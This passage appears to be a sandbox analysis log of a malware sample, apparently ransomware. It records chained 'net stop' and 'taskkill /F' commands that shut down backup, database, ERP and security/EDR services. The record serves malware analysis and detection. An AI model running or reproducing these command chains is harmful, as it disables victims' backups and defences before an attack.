        PID:1808
  - - C:\Windows\SysWOW64\net.exe
      net stop K3MMainSuspendService
      4⤵
      PID:296
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop K3MMainSuspendService
        5⤵
        
        PID:4968
  - - C:\Windows\SysWOW64\net.exe
      net stop KpService
      4⤵
      PID:2796
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop KpService
        5⤵
        
        PID:2824
  - - C:\Windows\SysWOW64\net.exe
      net stop ceng_web_svc_d
      4⤵
      PID:696
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop ceng_web_svc_d
        5⤵
        
        PID:4216
  - - C:\Windows\SysWOW64\net.exe
      net stop KugouService
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:312
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop KugouService
        5⤵
        
        PID:2736
  - - C:\Windows\SysWOW64\net.exe
      net stop pcas
      4⤵
      PID:2000
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop pcas
        5⤵
        
        PID:4156
  - - C:\Windows\SysWOW64\net.exe
      net stop U8SendMailAdmin
      4⤵
      PID:2948
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop U8SendMailAdmin
        5⤵
        
        PID:1404
  - - C:\Windows\SysWOW64\net.exe
      net stop "Bonjour Service"
      4⤵
      PID:4304
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Bonjour Service"
        5⤵
        
        PID:2372
  - - C:\Windows\SysWOW64\net.exe
      net stop "Apple Mobile Device Service"
      4⤵
      PID:2156
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Apple Mobile Device Service"
        5⤵
        
        PID:4092
  - - C:\Windows\SysWOW64\net.exe
      net stop "ABBYY.Licensing.FineReader.Professional.12.0"
      4⤵
      PID:3080
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "ABBYY.Licensing.FineReader.Professional.12.0"
        5⤵
        
        PID:4760
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color a & @net stop HaoZipSvc & @net stop "igfxCUIService2.0.0.0" & @net stop Realtek11nSU & @net stop xenlite & @net stop XenSvc & @net stop Apache2.2 & @net stop "Synology Drive VSS Service x64" & @net stop DellDRLogSvc & @net stop FirebirdGuardianDeafaultInstance & @net stop JWEM3DBAUTORun & @net stop JWRinfoClientService & @net stop JWService & @net stop Service2 & @net stop RapidRecoveryAgent & @net stop FirebirdServerDefaultInstance & @net stop AdobeARMservice & @net stop VeeamCatalogSvc & @net stop VeeanBackupSvc & @net stop VeeamTransportSvc & @net stop TPlusStdAppService1300 & @net stop TPlusStdTaskService1300 & @net stop TPlusStdUpgradeService1300 & @net stop TPlusStdWebService1300 & @net stop VeeamNFSSvc & @net stop VeeamDeploySvc & @net stop VeeamCloudSvc & @net stop VeeamMountSvc & @net stop VeeamBrokerSvc & @net stop VeeamDistributionSvc & @net stop tmlisten & @net stop ServiceMid & @net stop 360EntPGSvc & @net stop ClickToRunSvc & @net stop RavTask & @net stop AngelOfDeath & @net stop d_safe & @net stop NFLicenceServer & @net stop "NetVault Process Manager" & @net stop RavService & @net stop DFServ & @net stop IngressMgr & @net stop EvtSys & @net stop K3ClouManager & @net stop NFVPrintServer & @net stop RTCAVMCU & @net stop CobianBackup10 & @net stop GNWebService & @net stop Mysoft.SchedulingService & @net stop AgentX & @net stop SentinelKeysServer & @net stop DGPNPSEV & @net stop TurboCRM70 & @net stop NFSysService & @net stop U8DispatchService & @net stop NFOTPService & @net stop U8EISService & @net stop U8EncryptService & @net stop U8GCService & @net stop U8KeyManagePool & @net stop U8MPool & @net stop U8SCMPool & @net stop U8SLReportService & @net stop U8TaskService & @net stop U8WebPool & @net stop UFAllNet & @net stop UFReportService & @net stop UTUService"
    3⤵
    PID:1068
  - - C:\Windows\SysWOW64\net.exe
      net stop HaoZipSvc
      4⤵
      PID:2156
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop HaoZipSvc
        5⤵
        
        PID:4100
  - - C:\Windows\SysWOW64\net.exe
      net stop "igfxCUIService2.0.0.0"
      4⤵
      PID:4588
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "igfxCUIService2.0.0.0"
        5⤵
        
        PID:4648
  - - C:\Windows\SysWOW64\net.exe
      net stop Realtek11nSU
      4⤵
      PID:5016
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop Realtek11nSU
        5⤵
        
        PID:5064
  - - C:\Windows\SysWOW64\net.exe
      net stop xenlite
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1772
  - - C:\Windows\SysWOW64\net.exe
      net stop XenSvc
      4⤵
      PID:4876
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop XenSvc
        5⤵
        
        PID:4844
  - - C:\Windows\SysWOW64\net.exe
      net stop Apache2.2
      4⤵
      PID:4336
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop Apache2.2
        5⤵
        
        PID:4460
  - - C:\Windows\SysWOW64\net.exe
      net stop "Synology Drive VSS Service x64"
      4⤵
      PID:4304
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$PROGID"
        5⤵
        
        PID:696
  - - C:\Windows\SysWOW64\net.exe
      net stop DellDRLogSvc
      4⤵
      PID:5076
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop DellDRLogSvc
        5⤵
        
        PID:2732
  - - C:\Windows\SysWOW64\net.exe
      net stop FirebirdGuardianDeafaultInstance
      4⤵
      PID:4560
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop FirebirdGuardianDeafaultInstance
        5⤵
        
        PID:4676
  - - C:\Windows\SysWOW64\net.exe
      net stop JWEM3DBAUTORun
      4⤵
      PID:4476
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop JWEM3DBAUTORun
        5⤵
        
        PID:1404
  - - C:\Windows\SysWOW64\net.exe
      net stop JWRinfoClientService
      4⤵
      PID:2704
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop JWRinfoClientService
        5⤵
        
        PID:4436
  - - C:\Windows\SysWOW64\net.exe
      net stop JWService
      4⤵
      PID:4388
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop JWService
        5⤵
        
        PID:2052
  - - C:\Windows\SysWOW64\net.exe
      net stop Service2
      4⤵
      PID:4868
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop Service2
        5⤵
        
        PID:4680
  - - C:\Windows\SysWOW64\net.exe
      net stop RapidRecoveryAgent
      4⤵
      PID:4732
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop RapidRecoveryAgent
        5⤵
        
        PID:3500
  - - C:\Windows\SysWOW64\net.exe
      net stop FirebirdServerDefaultInstance
      4⤵
      PID:64
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop FirebirdServerDefaultInstance
        5⤵
        
        PID:2052
  - - C:\Windows\SysWOW64\net.exe
      net stop AdobeARMservice
      4⤵
      PID:4860
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop AdobeARMservice
        5⤵
        
        PID:4120
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeamCatalogSvc
      4⤵
      PID:1544
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamCatalogSvc
        5⤵
        
        PID:4916
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeanBackupSvc
      4⤵
      PID:4608
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeanBackupSvc
        5⤵
        
        PID:1620
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeamTransportSvc
      4⤵
      PID:4420
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamTransportSvc
        5⤵
        
        PID:2104
  - - C:\Windows\SysWOW64\net.exe
      net stop TPlusStdAppService1300
      4⤵
      PID:4896
  - - C:\Windows\SysWOW64\net.exe
      net stop TPlusStdTaskService1300
      4⤵
      PID:4860
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop TPlusStdTaskService1300
        5⤵
        
        PID:1404
  - - C:\Windows\SysWOW64\net.exe
      net stop TPlusStdUpgradeService1300
      4⤵
      PID:4480
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop TPlusStdUpgradeService1300
        5⤵
        
        PID:2220
  - - C:\Windows\SysWOW64\net.exe
      net stop TPlusStdWebService1300
      4⤵
      PID:4532
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop TPlusStdWebService1300
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2844
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeamNFSSvc
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4620
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamNFSSvc
        5⤵
        
        PID:8
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeamDeploySvc
      4⤵
      PID:2032
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamDeploySvc
        5⤵
        
        PID:2204
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeamCloudSvc
      4⤵
      PID:4576
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamCloudSvc
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4712
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeamMountSvc
      4⤵
      PID:284
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamMountSvc
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4012
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeamBrokerSvc
      4⤵
      PID:4536
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamBrokerSvc
        5⤵
        
        PID:2836
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeamDistributionSvc
      4⤵
      PID:4120
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamDistributionSvc
        5⤵
        
        PID:4156
  - - C:\Windows\SysWOW64\net.exe
      net stop tmlisten
      4⤵
      PID:2204
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop tmlisten
        5⤵
        
        PID:4596
  - - C:\Windows\SysWOW64\net.exe
      net stop ServiceMid
      4⤵
      PID:1384
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop ServiceMid
        5⤵
        
        PID:4508
  - - C:\Windows\SysWOW64\net.exe
      net stop 360EntPGSvc
      4⤵
      PID:2504
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop 360EntPGSvc
        5⤵
        
        PID:3872
  - - C:\Windows\SysWOW64\net.exe
      net stop ClickToRunSvc
      4⤵
      PID:284
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop ClickToRunSvc
        5⤵
        
        PID:1308
  - - C:\Windows\SysWOW64\net.exe
      net stop RavTask
      4⤵
      PID:4496
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop RavTask
        5⤵
        
        PID:312
  - - C:\Windows\SysWOW64\net.exe
      net stop AngelOfDeath
      4⤵
      PID:4448
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop AngelOfDeath
        5⤵
        
        PID:4616
  - - C:\Windows\SysWOW64\net.exe
      net stop d_safe
      4⤵
      PID:4564
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop d_safe
        5⤵
        
        PID:2984
  - - C:\Windows\SysWOW64\net.exe
      net stop NFLicenceServer
      4⤵
      PID:4908
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop NFLicenceServer
        5⤵
        
        PID:4760
  - - C:\Windows\SysWOW64\net.exe
      net stop "NetVault Process Manager"
      4⤵
      PID:4512
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "NetVault Process Manager"
        5⤵
        
        PID:1772
  - - C:\Windows\SysWOW64\net.exe
      net stop RavService
      4⤵
      PID:4472
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop RavService
        5⤵
        
        PID:1712
  - - C:\Windows\SysWOW64\net.exe
      net stop DFServ
      4⤵
      PID:3500
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop DFServ
        5⤵
        
        PID:4104
  - - C:\Windows\SysWOW64\net.exe
      net stop IngressMgr
      4⤵
      PID:4400
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop IngressMgr
        5⤵
        
        PID:4820
  - - C:\Windows\SysWOW64\net.exe
      net stop EvtSys
      4⤵
      PID:616
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop EvtSys
        5⤵
        
        PID:1812
  - - C:\Windows\SysWOW64\net.exe
      net stop K3ClouManager
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4568
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop K3ClouManager
        5⤵
        
        PID:4984
  - - C:\Windows\SysWOW64\net.exe
      net stop NFVPrintServer
      4⤵
      PID:4440
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop NFVPrintServer
        5⤵
        
        PID:4788
  - - C:\Windows\SysWOW64\net.exe
      net stop RTCAVMCU
      4⤵
      PID:4160
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop RTCAVMCU
        5⤵
        
        PID:4116
  - - C:\Windows\SysWOW64\net.exe
      net stop CobianBackup10
      4⤵
      PID:4252
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop CobianBackup10
        5⤵
        
        PID:1396
  - - C:\Windows\SysWOW64\net.exe
      net stop GNWebService
      4⤵
      PID:5012
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop GNWebService
        5⤵
        
        PID:4784
  - - C:\Windows\SysWOW64\net.exe
      net stop Mysoft.SchedulingService
      4⤵
      PID:5072
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop Mysoft.SchedulingService
        5⤵
        
        PID:5032
  - - C:\Windows\SysWOW64\net.exe
      net stop AgentX
      4⤵
      PID:2368
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop AgentX
        5⤵
        
        PID:4980
  - - C:\Windows\SysWOW64\net.exe
      net stop SentinelKeysServer
      4⤵
      PID:2916
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SentinelKeysServer
        5⤵
        
        PID:1284
  - - C:\Windows\SysWOW64\net.exe
      net stop DGPNPSEV
      4⤵
      PID:4664
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop DGPNPSEV
        5⤵
        
        PID:5016
  - - C:\Windows\SysWOW64\net.exe
      net stop TurboCRM70
      4⤵
      PID:4504
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop TurboCRM70
        5⤵
        
        PID:5108
  - - C:\Windows\SysWOW64\net.exe
      net stop NFSysService
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4696
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop NFSysService
        5⤵
        
        PID:288
  - - C:\Windows\SysWOW64\net.exe
      net stop U8DispatchService
      4⤵
      PID:4576
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop U8DispatchService
        5⤵
        
        PID:4852
  - - C:\Windows\SysWOW64\net.exe
      net stop NFOTPService
      4⤵
      PID:2504
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop NFOTPService
        5⤵
        
        PID:4820
  - - C:\Windows\SysWOW64\net.exe
      net stop U8EISService
      4⤵
      PID:5100
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop U8EISService
        5⤵
        
        PID:4900
  - - C:\Windows\SysWOW64\net.exe
      net stop U8EncryptService
      4⤵
      PID:1600
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop U8EncryptService
        5⤵
        
        PID:2824
  - - C:\Windows\SysWOW64\net.exe
      net stop U8GCService
      4⤵
      PID:3004
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop U8GCService
        5⤵
        
        PID:2836
  - - C:\Windows\SysWOW64\net.exe
      net stop U8KeyManagePool
      4⤵
      PID:4972
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop U8KeyManagePool
        5⤵
        
        PID:4520
  - - C:\Windows\SysWOW64\net.exe
      net stop U8MPool
      4⤵
      PID:4440
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop U8MPool
        5⤵
        
        PID:4360
  - - C:\Windows\SysWOW64\net.exe
      net stop U8SCMPool
      4⤵
      PID:4800
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop U8SCMPool
        5⤵
        
        PID:4716
  - - C:\Windows\SysWOW64\net.exe
      net stop U8SLReportService
      4⤵
      PID:4608
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop U8SLReportService
        5⤵
        
        PID:3632
  - - C:\Windows\SysWOW64\net.exe
      net stop U8TaskService
      4⤵
      PID:4896
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop U8TaskService
        5⤵
        
        PID:3060
  - - C:\Windows\SysWOW64\net.exe
      net stop U8WebPool
      4⤵
      PID:1816
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop U8WebPool
        5⤵
        
        PID:5096
  - - C:\Windows\SysWOW64\net.exe
      net stop UFAllNet
      4⤵
      PID:2668
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop UFAllNet
        5⤵
        
        PID:4452
  - - C:\Windows\SysWOW64\net.exe
      net stop UFReportService
      4⤵
      PID:2816
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop UFReportService
        5⤵
        
        PID:3092
  - - C:\Windows\SysWOW64\net.exe
      net stop UTUService
      4⤵
      PID:380
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop UTUService
        5⤵
        
        PID:2368
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color e & @taskkill /IM sqlservr.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM java.exe /F & @taskkill /IM fdhost.exe /F & @taskkill /IM fdlauncher.exe /F & @taskkill /IM Veeam.Backup.Service.exe /F & @taskkill /IM reportingservicesservice.exe /F & @taskkill /IM softmgrlite.exe /F & @taskkill /IM sqlbrowser.exe /F & @taskkill /IM ssms.exe /F & @taskkill /IM vmtoolsd.exe /F & @taskkill /IM baidunetdisk.exe /F & @taskkill /IM yundetectservice.exe /F & @taskkill /IM ssclient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM RAVCp164.exe /F & @taskkill /IM igfxEM.exe /F & @taskkill /IM igfxHK.exe /F & @taskkill /IM igfxTray.exe /F & @taskkill /IM 360bdoctor.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM PrivacyIconClient.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM GoogleCrashHandler.exe /F & @taskkill /IM GoogleCrashHandler64.exe /F & @taskkill /IM GoogleUpdate.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM "FileZilla server.exe" /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM Admin.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM tomcat7.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM Kingdee.K3.CRM.MMC.MMCService.exe /F & @taskkill /IM Kingdee.k3.Weixin.ClientService.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM ImtsEventSvr.exe /F & @taskkill /IM mysqld-nt.exe /F & @taskkill /IM 360EnterpriseDiskUI.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM tomcat8.exe /F & @taskkill /IM QQprotect.exe /F & @taskkill /IM isqlplussvc.exe /F & @taskkill /IM nmesrvc.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM jusched.exe /F & @taskkill /IM MtxHotPlugService.exe /F & @taskkill /IM jucheck.exe /F & @taskkill /IM wordpad.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM chrome.exe /F & @taskkill /IM Thunder.exe /F"
    3⤵
    PID:4124
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM sqlservr.exe /F
      4⤵
      PID:4712
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM httpd.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4684
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM java.exe /F
      4⤵
      PID:4512
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM fdhost.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:372
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM fdlauncher.exe /F
      4⤵
      PID:3416
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Veeam.Backup.Service.exe /F
      4⤵
      PID:5000
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM reportingservicesservice.exe /F
      4⤵
      PID:4724
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM softmgrlite.exe /F
      4⤵
      PID:5092
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM sqlbrowser.exe /F
      4⤵
      PID:3992
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ssms.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4564
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM vmtoolsd.exe /F
      4⤵
      PID:5020
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM baidunetdisk.exe /F
      4⤵
      PID:4508
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM yundetectservice.exe /F
      4⤵
      PID:2052
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ssclient.exe /F
      4⤵
      PID:888
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM GNAupdaemon.exe /F
      4⤵
      PID:4648
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM RAVCp164.exe /F
      4⤵
      PID:1080
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM igfxEM.exe /F
      4⤵
      PID:4652
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM igfxHK.exe /F
      4⤵
      PID:4768
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM igfxTray.exe /F
      4⤵
      PID:8
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM 360bdoctor.exe /F
      4⤵
      PID:4436
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM GNCEFExternal.exe /F
      4⤵
      PID:3768
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM PrivacyIconClient.exe /F
      4⤵
      PID:4364
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM UIODetect.exe /F
      4⤵
      PID:1952
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM AutoDealService.exe /F
      4⤵
      PID:3796
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM IDDAService.exe /F
      4⤵
      PID:4884
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM EnergyDataService.exe /F
      4⤵
      PID:2044
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM MPService.exe /F
      4⤵
      PID:1168
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM TransMain.exe /F
      4⤵
      PID:3532
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM DAService.exe /F
      4⤵
      PID:4780
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM GoogleCrashHandler.exe /F
      4⤵
      Kills process with taskkill
      PID:4144
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM GoogleCrashHandler64.exe /F
      4⤵
      PID:2916
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM GoogleUpdate.exe /F
      4⤵
      PID:4916
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM cohernece.exe /F
      4⤵
      PID:4464
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM vmware-tray.exe /F
      4⤵
      PID:4884
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM MsDtsSrvr.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4960
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM msmdsrv.exe /F
      4⤵
      PID:4740
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM "FileZilla server.exe" /F
      4⤵
      PID:4904
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM UpdateData.exe /F
      4⤵
      PID:4864
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM WebApi.Host.exe /F
      4⤵
      PID:2220
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color e & @taskkill /IM VBoxSDS.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM TeamViewer_Service.exe /F & @taskkill /IM TeamViewer.exe /F & @taskkill /IM CasLicenceServer.exe /F & @taskkill /IM tv_w32.exe /F & @taskkill /IM tv_x64.exe /F & @taskkill /IM rdm.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM SecureCRTPortable.exe /F & @taskkill /IM VirtualBox.exe /F & @taskkill /IM VBoxSVC.exe /F & @taskkill /IM VirtualBoxVM.exe /F & @taskkill /IM abs_deployer.exe /F & @taskkill /IM edr_monitor.exe /F & @taskkill /IM sfupdatemgr.exe /F & @taskkill /IM ipc_proxy.exe /F & @taskkill /IM edr_agent.exe /F & @taskkill /IM edr_sec_plan.exe /F & @taskkill /IM sfavsvc.exe /F & @taskkill /IM DataShareBox.ShareBoxMonitorService.exe /F & @taskkill /IM DataShareBox.ShareBoxService.exe /F & @taskkill /IM Jointsky.CloudExchangeService.exe /F & @taskkill /IM Jointsky.CloudExchange.NodeService.ein /F & @taskkill /IM perl.exe /F & @taskkill /IM java.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM TsServer.exe /F & @taskkill /IM AppMain.exe /F & @taskkill /IM easservice.exe /F & @taskkill /IM Kingdee6.1.exe /F & @taskkill /IM QyKernel.exe /F & @taskkill /IM QyFragment.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM ComputerZTray.exe /F & @taskkill /IM ComputerZService.exe /F & @taskkill /IM ClearCache.exe /F & @taskkill /IM ProLiantMonitor.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM bugreport.exe /F & @taskkill /IM GNWebServer.exe /F & @taskkill /IM UI0Detect.exe /F & @taskkill /IM GNCore.exe /F & @taskkill /IM gnwayDDNS.exe /F & @taskkill /IM GNWebHelper.exe /F & @taskkill /IM php-cgi.exe /F & @taskkill 